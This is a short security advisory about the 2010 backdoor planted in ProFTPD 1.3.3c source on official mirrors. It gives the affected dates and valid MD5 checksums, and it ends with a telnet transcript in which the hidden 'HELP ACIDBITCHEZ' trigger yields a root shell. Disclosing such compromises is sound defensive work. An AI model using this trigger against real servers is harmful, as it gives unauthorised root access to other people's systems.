ProFTPD 1.3.3c Briefly Backdoored by Hackers
Servers of the widely popular FTP server, ProFTPD, were compromised (probably with 0day) on the 28th of November 2010. During the attack, some source code was modified to insert a backdoor. The source files affected were for ProFTPD version 1.3.3c., between the 28/11/2010 and 02/12/2010.
The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon.
If you installed or updated ProFTPD from one of the official mirrors during that time, it is recommended that you recompile from a known good version of the code. The source modification was spotted and rectified on 01/12/2010. MD5 sums for the valid source tarballs:
8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2
4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz
Hit the jump for details on how the backdoor is triggered. A Metasploit module is available to automate the exploit.
$ telnet 0 21Trying 0.0.0.0…Connected to 0.Escape character is ‘^]’.220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [127.0.0.1]HELP214-The following commands are recognized (* =>’s unimplemented):CWD XCWD CDUP XCUP SMNT* QUIT PORT PASVEPRT EPSV ALLO* RNFR RNTO DELE MDTM RMDXRMD MKD XMKD PWD XPWD SIZE SYST HELPNOOP FEAT OPTS AUTH* CCC* CONF* ENC* MIC*PBSZ* PROT* TYPE STRU MODE RETR STOR STOUAPPE REST ABOR USER PASS ACCT* REIN* LISTNLST STAT SITE MLSD MLST214 Direct comments to someone@somewhereHELP ANOOP502 Unknown command ‘ANOOP’HELP a502 Unknown command ‘A’HELP ACIDBITCHEZid ;uid=0(root) gid=0(root) groups=0(root),65534(nogroup)